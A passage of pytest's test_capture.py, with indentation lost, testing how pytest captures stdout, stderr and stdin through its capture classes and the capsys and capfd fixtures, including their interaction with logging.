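            jobs.task_done()
    for _ in range(worker_count):
        t = threading.Thread(target=handle)
        t.daemon = True
        t.start()
    for j in range(job_count):
        jobs.put(j)
    jobs.join()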
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.pytester import Testdir
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def StdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0) if in_ else None,
out=capture.SysCapture(1) if out else None,
err=capture.SysCapture(2) if err else None,
)
def TeeStdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0, tee=True) if in_ else None,
out=capture.SysCapture(1, tee=True) if out else None,
err=capture.SysCapture(2, tee=True) if err else None,
)
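# Illustrative sketch, not part of the original tests: how one of the helper
# factories above can be exercised directly. start_capturing(), readouterr()
# and stop_capturing() are pytest-internal MultiCapture API, so this is only
# a sketch of that internal usage, not a supported public pattern.
def _multicapture_sketch():
    cap = StdCapture(in_=False)
    cap.start_capturing()
    print("captured line")
    out, err = cap.readouterr()
    cap.stop_capturing()
    assert out == "captured line\n"
    assert err == ""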
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
    def test_capfd_preserves_newlines(self, capfd, nl):
print("test", end=nl)
out, err = capfd.readouterr()
assert out.endswith(nl)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
def test_disabled_capture_fixture_twice(self, testdir: Testdir) -> None:
"""Test that an inner disabled() exit doesn't undo an outer disabled().
Issue #7148.
"""
testdir.makepyfile(
"""
def test_disabled(capfd):
print('captured before')
with capfd.disabled():
print('while capture is disabled 1')
with capfd.disabled():
print('while capture is disabled 2')
print('while capture is disabled 1 after')
print('captured after')
assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
[
"*while capture is disabled 1",
"*while capture is disabled 2",
"*while capture is disabled 1 after",
],
consecutive=True,
)
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""Ensure that capsys and capfd can be used by other fixtures during
setup and teardown."""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
def test_captureresult() -> None:
cr = CaptureResult("out", "err")
assert len(cr) == 2
assert cr.out == "out"
assert cr.err == "err"
out, err = cr
assert out == "out"
assert err == "err"
assert cr[0] == "out"
assert cr[1] == "err"
assert cr == cr
assert cr == CaptureResult("out", "err")
assert cr != CaptureResult("wrong", "err")
assert cr == ("out", "err")
assert cr != ("out", "wrong")
assert hash(cr) == hash(CaptureResult("out", "err"))
assert hash(cr) == hash(("out", "err"))
assert hash(cr) != hash(("out", "wrong"))
assert cr < ("z",)
assert cr < ("z", "b")
assert cr < ("z", "b", "c")
assert cr.count("err") == 1
assert cr.count("wrong") == 0
assert cr.index("err") == 1
with pytest.raises(ValueError):
assert cr.index("wrong") == 0
assert next(iter(cr)) == "out"
assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
pytest.raises(AssertionError, cap.snap)
cap.done()
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(AssertionError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AssertionError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
cap.targetfd_save, cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n"."""
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.start_capturing()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from fnmatch import fnmatch
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(1, b"stdout")
assert cap.readouterr() == ("stdout", "")
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(2, b"stderr")
assert cap.readouterr() == ("", "stderr")
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_fdcapture_invalid_fd_with_fd_reuse(self, testdir):
with saved_fd(1):
os.close(1)
cap = capture.FDCaptureBinary(1)
cap.start()
os.write(1, b"started")
cap.suspend()
os.write(1, b" suspended")
cap.resume()
os.write(1, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(1, b"done")
def test_fdcapture_invalid_fd_without_fd_reuse(self, testdir):
with saved_fd(1), saved_fd(2):
os.close(1)
os.close(2)
cap = capture.FDCaptureBinary(2)
cap.start()
os.write(2, b"started")
cap.suspend()
os.write(2, b" suspended")
cap.resume()
os.write(2, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(2, b"done")
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
cap = StdCaptureFD(out=False, err=True)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize(
"method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(testdir, method: str) -> None:
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(
in_=None,
out=None,
err=capture.%s,
)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
